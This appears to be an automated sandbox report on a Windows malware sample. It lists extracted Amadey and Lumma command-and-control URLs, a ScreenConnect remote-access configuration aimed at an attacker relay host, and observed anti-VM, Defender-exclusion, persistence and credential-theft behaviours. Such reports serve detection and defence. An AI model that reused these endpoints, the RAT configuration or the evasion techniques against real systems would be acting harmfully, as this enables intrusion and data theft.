Analysis
max time kernel: 150s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64 arch:x86 image:win10v2004-20241007-en locale:en-us os:windows10-2004-x64 system
submitted: 20-12-2024 02:13
Static task: static1
Behavioral task: behavioral1
  Sample: 055c34101c332838618fdedb730655f61b97553c5e56df94efd373667a3db895.exe
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: 055c34101c332838618fdedb730655f61b97553c5e56df94efd373667a3db895.exe
  Resource: win10v2004-20241007-en
General
Target: 055c34101c332838618fdedb730655f61b97553c5e56df94efd373667a3db895.exe
Size: 2.8MB
MD5: 8cbe0ced0c0f7bfbdf19128ba80adb99
SHA1: 15e615a0fe64fe5200dd916232d9bc26b1c3d815
SHA256: 055c34101c332838618fdedb730655f61b97553c5e56df94efd373667a3db895
SHA512: 4b258260770b08fdd8f14b7bf0e703b8ca5010e4698e457bc0cfc76c246fb9e7c60ee4d2068b717f8205c2c1954d3b6b8742ed2547b67082f5b89c63d850e938
SSDEEP: 49152:kNv6yZz1fXBB9nu/SkIK3OdW+56W0xSDmoJb3:s6yZz1fRB9nu/SkIK3ibpDmA
Malware Config
Extracted: amadey
4.42
9c9aa5
http://185.215.113.43
install_dir: abc3bc1985
install_file: skotes.exe
strings_key: 8a35cf2ea38c2817dba29a4b5b25dcf0
url_paths: /Zu7JuNko/index.php
Extracted: lumma
https://sordid-snaked.cyou/api
https://awake-weaves.cyou/api
https://wrathful-jammy.cyou/api
https://debonairnukk.xyz/api
https://diffuculttan.xyz/api
https://effecterectz.xyz/api
https://deafeninggeh.biz/api
https://immureprech.biz/api
Signatures
Amadey family
Detect Vidar Stealer 3 IoCs
resource | yara_rule
behavioral2/files/0x0009000000023bd3-210.dat | family_vidar_v7
behavioral2/memory/2904-213-0x0000000000400000-0x0000000000639000-memory.dmp | family_vidar_v7
behavioral2/memory/2904-636-0x0000000000400000-0x0000000000639000-memory.dmp | family_vidar_v7
Lumma family
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description | pid | Process | procid_target
PID 3940 created 3448 | 3940 | UZAj8wc.exe | 56
PID 1540 created 2664 | 1540 | 4913480162.exe | 44
Vidar family
Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF | c59adc6d69.exe
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | c59adc6d69.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | skotes.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 7796213aa8.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 4ba8da5cdc.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 4913480162.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | skotes.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 055c34101c332838618fdedb730655f61b97553c5e56df94efd373667a3db895.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | skotes.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 3573f91eb8.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 68c2153f03.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | skotes.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.
pid | Process
804 | powershell.exe
1936 | powershell.exe
5448 | powershell.exe
5148 | powershell.exe
Downloads MZ/PE file
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (98a59bd0eed9222b)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (98a59bd0eed9222b)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=gips620.top&p=8880&s=61f772e9-8983-4fd3-833d-601341ed72a3&k=BgIAAACkAABSU0ExAAgAAAEAAQDpOwIVy34yVx7xLDnH6rBeYx7mmiLN2yQyIYdJTxYIVHOsytxx89D0YKoH68EoEXToTuDpMmwJb%2bhrlJ3faNFTpvu7W8w3%2fxYUdeWuXWg%2bTQxXr6EWby912nykdroWfBxDx6Lmxg1gxGgRJHC8Oc96zV%2fiaqo5GlyagtszKkrbPOWW4FBVQPXhlUfH4mlFE0i0vcMxGginTYl8IjGBzr94ANeAXwajoe9Cjam2haoL%2f%2bgHMtFYBZJisALFnyX3zECpRv7vqWzNAQJYIqY6qDuC2lEbs0NtuBMSfQRW1t0ZOk7cEzuQjq72QbWf1bR8rZf%2b0t3VNSgkIUcBljvpSRK7&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAppIU89Zza02FmB%2bI4UVSKwAAAAACAAAAAAAQZgAAAAEAACAAAAD0HYLpxhyUiuUgZc9K3eAFstaQGhECrzr15py9%2bE4Q7gAAAAAOgAAAAAIAACAAAABgNjLYlNzwEixn6nC37WgkxmUNWxnL1w%2bPXSDDx623AqAEAAA6Vybka4ukU1jsHkHHu%2fdkLGtik%2fBdkBRjF4dkzWZ9nXgRQ40Mh2%2f8VwYXwcx2UdC5eJVvagFX9WvftF0z8WoowTfcJXCG0dt8HPx%2b%2fQOZ%2f%2fWIIksWhtUAJk1YQAFzQAHuNPfmq1iZWlMTCydMFD5FCApLrjotDbJv6mxrisb17re2qb4tjejGJ2piIX2%2bacdoQuPDF3qCFo%2fNG2uIkVvdVGT1ncvIaLruHi9U6n2PaUotPra3nGCS82EA4PZ%2fvTxmwIYYZhZqnihhpUdLRPm4mNLn9Pah%2fxFveuVlvw6eSkNvAhYYoVbLXngW0TqdM0SbNINIKo2C6tUkCbvcqA9hlO8J9YQ4AZL4B1Du1dlzWaGZ2r9WdbgjnSi2xtyVUAYLkd85aGnJSgzxakQWdocl906sFCr8GWpWGXaydnH%2babSQgOfFeUOaAiR1wfvaWqSBZMqR2UEpUiNtPrlsM5BNfuW9izu3bDjSdCeBhOB0%2bO0y%2brTtD01W0ZEKuEl0odsF6PEW4DeDS5MM0YM%2bwzAS2tk9ZXAx%2bwBKUbBbFQem2GLnB6tTMxOZvfF8L3W5jhBInNcMUEdhmO5TnqYpPW16GUpaBV98US5Fkr8KKnLMXyzlcNSuOGL0dg7BcTmqVWwOd6fUoXonE0JjfkND3AGeDo8UqAw0BGn%2bzbfbFzoNO2BX3ZwEYPWhgSt5bRjBZFIPhnAroFx84u2E1ROAWg%2b09zAMn2jCNnzzi5XJwJeL9d2%2f7AM5t4MpreszRJMsX%2bPZ%2bIm59xeR5aELsFhicczvKaBhskKv0%2bGlhimpGQvRZ0RTQxZqRxTYctqPhrV3C%2bHuD%2bisps09DyHXYAG75wF8rX2wIiv4mbBORAJitP%2bry%2bqU%2boZnf521%2fk0jJEisXqfI%2f1z6i8uuDg4V0aghPXIpQTqUFkfkIf7TlE95S666vEuCBAdL3Ay1qqtE82BcoPRU%2fZy7MPKpU4DlzhF%2bEUGB%2fTmbsY%2ft5TFl01X1ynzTrtqdb5uysuTEDGvCRB
9VdxrE0c6oWt9O4jtlPY88k2oZcxU1NX7snQLY5AJpHiAncxLikBB9MgwbvnaeUCdWFMrZs1byvmrM9bA7fd4ki%2fs4S1WTV5F7X0ZP0tuhi5w9FOIT9CCR%2f%2fxrEVAf2qorH%2b1N62ZBAO6XF7PoCeJtYMSA4FbR3r9AD%2f9W4Wq66gxUkvNUWtMvGc6pVu59NUwGwGbIJ12lYwjlI5QqYwr6cT9MEA%2fZ4eWde6MLc%2bLF17i8TFRTAmso4PApgAMyqLPBrDHxMZ3B9S8JxiUF1Mv00nRTdWhwCh0opcdQiulX%2fFL2EISDhuzPW9NuPiOIQlFbAD1Wbn5LR7iMoxBds%2fBiHRcW0fRfTFEEnsRfV0PiAvwqHrw582ilks7XYjNJbnruJ4T1jiv6%2b0PXCCSxoketZ%2bTH%2fnET7WlqWFKF1ky%2bT%2bdB5L5BqRuld6kV5%2biPlgleHRYqO%2fhs1vVAtaNUIQlUqQjlYgfUNtDG5wSJqT%2bCkoF3L%2fzJf6FVnZDYsBKaUtsoDQwDcn0jdDTaIjf%2bTnZ7IHx8Hi8HKo65JSEOgjnMdPWPwEAAAABLW%2b8AUkwM943pQU6LOcE6Zg02w3QfQOH0mo9j2b20fDb6Uk3pXq%2f%2boMf6AV6Di1sCogjhTYR0M6wgFCHnBD33&c=VIRUS101&c=https%3a%2f%2ft.me%2fvirus101Screenconnect&c=PC%20RAT&c=PC%20RAT&c=&c=&c=&c=\"" ScreenConnect.ClientService.exe -
Checks BIOS information in registry 2 TTPs 22 IoCs
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 055c34101c332838618fdedb730655f61b97553c5e56df94efd373667a3db895.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | skotes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 7796213aa8.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 3573f91eb8.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | skotes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | skotes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 68c2153f03.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | skotes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | skotes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 4ba8da5cdc.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 4913480162.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | c59adc6d69.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 68c2153f03.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | skotes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 4ba8da5cdc.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 4913480162.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | skotes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 055c34101c332838618fdedb730655f61b97553c5e56df94efd373667a3db895.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | skotes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 7796213aa8.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 3573f91eb8.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | c59adc6d69.exe
Checks computer location settings 2 TTPs 9 IoCs
Looks up the country code configured in the registry, likely for geofencing.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | b2b654d781.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | ga70pjP.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | NN9Dd7c.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | cfe32a70b98540d9861909672f4b70a8.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | 4b8d248ac5a44344a64afd9f747a9e45.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | UZAj8wc.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | 804a4385fd.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | 055c34101c332838618fdedb730655f61b97553c5e56df94efd373667a3db895.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | skotes.exe
Drops startup file 3 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ApproximateSize.vbs | UZAj8wc.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VIRUS101RatPayload.lnk | InstallUtil.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VIRUS101RatPayload.lnk | InstallUtil.exe
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
Executes dropped EXE 42 IoCs
pid | Process
4612 | skotes.exe
4028 | NN9Dd7c.exe
1684 | ga70pjP.exe
4848 | INOKWGC.exe
2904 | 4b8d248ac5a44344a64afd9f747a9e45.exe
5052 | cfe32a70b98540d9861909672f4b70a8.exe
1784 | 8ZVMneG.exe
656 | 8ZVMneG.exe
540 | 8ZVMneG.exe
3940 | UZAj8wc.exe
6672 | skotes.exe
5764 | ScreenConnect.ClientService.exe
6240 | ScreenConnect.WindowsClient.exe
6584 | ScreenConnect.WindowsClient.exe
6868 | 7796213aa8.exe
5960 | c7ac8b2876.exe
6444 | c7ac8b2876.exe
3220 | 4ba8da5cdc.exe
3148 | c1e8d0e648.exe
6680 | 3573f91eb8.exe
3760 | c1e8d0e648.exe
1540 | 4913480162.exe
6460 | skotes.exe
3508 | 804a4385fd.exe
5200 | 057af55804f941a1bfb3623a361b7ab9.exe
5300 | b2b654d781.exe
1432 | 7z.exe
5256 | 7z.exe
2372 | 7z.exe
656 | 7z.exe
5244 | 7z.exe
6732 | 7z.exe
4360 | 7z.exe
6072 | 7z.exe
5940 | in.exe
5416 | c59adc6d69.exe
6164 | 68c2153f03.exe
7100 | 47493c571e.exe
6020 | 47493c571e.exe
924 | 6c81dae2fe.exe
5816 | skotes.exe
5840 | Intel_PTT_EK_Recertification.exe
Identifies Wine through registry keys 2 TTPs 11 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine | c59adc6d69.exe
Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine | 055c34101c332838618fdedb730655f61b97553c5e56df94efd373667a3db895.exe
Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine | skotes.exe
Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine | skotes.exe
Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine | 7796213aa8.exe
Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine | 4ba8da5cdc.exe
Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine | 3573f91eb8.exe
Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine | 4913480162.exe
Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine | skotes.exe
Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine | 68c2153f03.exe
Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine | skotes.exe
Loads dropped DLL 30 IoCs
pid | Process
4916 | MsiExec.exe
1460 | rundll32.exe
1460 | rundll32.exe
1460 | rundll32.exe
1460 | rundll32.exe
1460 | rundll32.exe
1460 | rundll32.exe
1460 | rundll32.exe
1460 | rundll32.exe
1460 | rundll32.exe
2412 | MsiExec.exe
5844 | MsiExec.exe
5764 | ScreenConnect.ClientService.exe
5764 | ScreenConnect.ClientService.exe
5764 | ScreenConnect.ClientService.exe
5764 | ScreenConnect.ClientService.exe
5764 | ScreenConnect.ClientService.exe
5764 | ScreenConnect.ClientService.exe
5764 | ScreenConnect.ClientService.exe
5764 | ScreenConnect.ClientService.exe
5764 | ScreenConnect.ClientService.exe
5764 | ScreenConnect.ClientService.exe
1432 | 7z.exe
5256 | 7z.exe
2372 | 7z.exe
656 | 7z.exe
5244 | 7z.exe
6732 | 7z.exe
4360 | 7z.exe
6072 | 7z.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
Adds Run key to start application 2 TTPs 1 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7796213aa8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1018024001\\7796213aa8.exe" | skotes.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description | ioc | Process
File opened (read-only) | \??\K: | msiexec.exe
File opened (read-only) | \??\N: | msiexec.exe
File opened (read-only) | \??\V: | msiexec.exe
File opened (read-only) | \??\S: | msiexec.exe
File opened (read-only) | \??\Y: | msiexec.exe
File opened (read-only) | \??\O: | msiexec.exe
File opened (read-only) | \??\Q: | msiexec.exe
File opened (read-only) | \??\A: | msiexec.exe
File opened (read-only) | \??\Y: | msiexec.exe
File opened (read-only) | \??\Z: | msiexec.exe
File opened (read-only) | \??\B: | msiexec.exe
File opened (read-only) | \??\P: | msiexec.exe
File opened (read-only) | \??\X: | msiexec.exe
File opened (read-only) | \??\B: | msiexec.exe
File opened (read-only) | \??\E: | msiexec.exe
File opened (read-only) | \??\H: | msiexec.exe
File opened (read-only) | \??\H: | msiexec.exe
File opened (read-only) | \??\I: | msiexec.exe
File opened (read-only) | \??\O: | msiexec.exe
File opened (read-only) | \??\Q: | msiexec.exe
File opened (read-only) | \??\T: | msiexec.exe
File opened (read-only) | \??\R: | msiexec.exe
File opened (read-only) | \??\S: | msiexec.exe
File opened (read-only) | \??\G: | msiexec.exe
File opened (read-only) | \??\Z: | msiexec.exe
File opened (read-only) | \??\T: | msiexec.exe
File opened (read-only) | \??\J: | msiexec.exe
File opened (read-only) | \??\L: | msiexec.exe
File opened (read-only) | \??\R: | msiexec.exe
File opened (read-only) | \??\W: | msiexec.exe
File opened (read-only) | \??\I: | msiexec.exe
File opened (read-only) | \??\J: | msiexec.exe
File opened (read-only) | \??\P: | msiexec.exe
File opened (read-only) | \??\X: | msiexec.exe
File opened (read-only) | \??\U: | msiexec.exe
File opened (read-only) | \??\A: | msiexec.exe
File opened (read-only) | \??\G: | msiexec.exe
File opened (read-only) | \??\U: | msiexec.exe
File opened (read-only) | \??\K: | msiexec.exe
File opened (read-only) | \??\N: | msiexec.exe
File opened (read-only) | \??\L: | msiexec.exe
File opened (read-only) | \??\W: | msiexec.exe
File opened (read-only) | \??\E: | msiexec.exe
File opened (read-only) | \??\M: | msiexec.exe
File opened (read-only) | \??\M: | msiexec.exe
File opened (read-only) | \??\V: | msiexec.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow | ioc
22 | raw.githubusercontent.com
23 | raw.githubusercontent.com
24 | raw.githubusercontent.com
209 | raw.githubusercontent.com
Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs
Suspicious Windows Authentication Registry Modification.
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800390038006100350039006200640030006500650064003900320032003200620029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 msiexec.exe -
Drops file in System32 directory 3 IoCs
description | ioc | Process
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (98a59bd0eed9222b)\ezo4bdgt.tmp | ScreenConnect.ClientService.exe
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (98a59bd0eed9222b)\ezo4bdgt.newcfg | ScreenConnect.ClientService.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log | ScreenConnect.WindowsClient.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
pid | Process
1868 | 055c34101c332838618fdedb730655f61b97553c5e56df94efd373667a3db895.exe
4612 | skotes.exe
6672 | skotes.exe
6868 | 7796213aa8.exe
3220 | 4ba8da5cdc.exe
6680 | 3573f91eb8.exe
1540 | 4913480162.exe
6460 | skotes.exe
5200 | 057af55804f941a1bfb3623a361b7ab9.exe
5200 | 057af55804f941a1bfb3623a361b7ab9.exe
5416 | c59adc6d69.exe
6164 | 68c2153f03.exe
5816 | skotes.exe
Suspicious use of SetThreadContext 6 IoCs
description | pid | Process | procid_target
PID 1784 set thread context of 656 | 1784 | 8ZVMneG.exe | 110
PID 3940 set thread context of 5544 | 3940 | UZAj8wc.exe | 148
PID 5960 set thread context of 6444 | 5960 | c7ac8b2876.exe | 151
PID 3148 set thread context of 3760 | 3148 | c1e8d0e648.exe | 158
PID 7100 set thread context of 6020 | 7100 | 47493c571e.exe | 198
PID 5840 set thread context of 5612 | 5840 | Intel_PTT_EK_Recertification.exe | 203
Drops file in Program Files directory 19 IoCs
description | ioc | Process
File created | C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsBackstageShell.exe | msiexec.exe
File created | C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\Client.en-US.resources | msiexec.exe
File created | C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\Client.Override.en-US.resources | msiexec.exe
File created | C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\Client.Override.resources | msiexec.exe
File created | C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.Core.dll | msiexec.exe
File created | C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsAuthenticationPackage.dll | msiexec.exe
File created | C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsFileManager.exe | msiexec.exe
File created | C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\app.config | msiexec.exe
File created | C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.Client.dll | msiexec.exe
File created | C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.Windows.dll | msiexec.exe
File created | C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsBackstageShell.exe.config | msiexec.exe
File created | C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe | msiexec.exe
File created | C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe.config | msiexec.exe
File created | C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsCredentialProvider.dll | msiexec.exe
File created | C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsFileManager.exe.config | msiexec.exe
File created | C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.ClientService.exe | msiexec.exe
File created | C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.ClientService.dll | msiexec.exe
File created | C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\system.config | msiexec.exe
File created | C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\Client.resources | msiexec.exe
Drops file in Windows directory 14 IoCs
description | ioc | Process
File created | C:\Windows\Installer\inprogressinstallinfo.ipi | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI3E3.tmp | msiexec.exe
File created | C:\Windows\Installer\e58028d.msi | msiexec.exe
File created | C:\Windows\Tasks\skotes.job | 055c34101c332838618fdedb730655f61b97553c5e56df94efd373667a3db895.exe
File opened for modification | C:\Windows\Installer\e58028b.msi | msiexec.exe
File created | C:\Windows\Installer\wix{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}.SchedServiceConfig.rmi | MsiExec.exe
File opened for modification | C:\Windows\Installer\{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}\DefaultIcon | msiexec.exe
File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI461.tmp | msiexec.exe
File created | C:\Windows\Installer\SourceHash{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD} | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI5D9.tmp | msiexec.exe
File created | C:\Windows\Installer\{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}\DefaultIcon | msiexec.exe
File created | C:\Windows\Installer\e58028b.msi | msiexec.exe
File opened for modification | C:\Windows\Installer\ | msiexec.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash 2 IoCs
pid | pid_target | Process | procid_target
6816 | 6680 | WerFault.exe | 154
7068 | 1540 | WerFault.exe | 159
System Location Discovery: System Language Discovery 1 TTPs 40 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | ga70pjP.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 4b8d248ac5a44344a64afd9f747a9e45.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 3573f91eb8.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | c1e8d0e648.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 4913480162.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | INOKWGC.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | MsiExec.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 4ba8da5cdc.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 47493c571e.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | NN9Dd7c.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | msiexec.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | MsiExec.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | c7ac8b2876.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | c7ac8b2876.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | c1e8d0e648.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 804a4385fd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 055c34101c332838618fdedb730655f61b97553c5e56df94efd373667a3db895.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 7796213aa8.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 057af55804f941a1bfb3623a361b7ab9.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | b2b654d781.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 47493c571e.exe
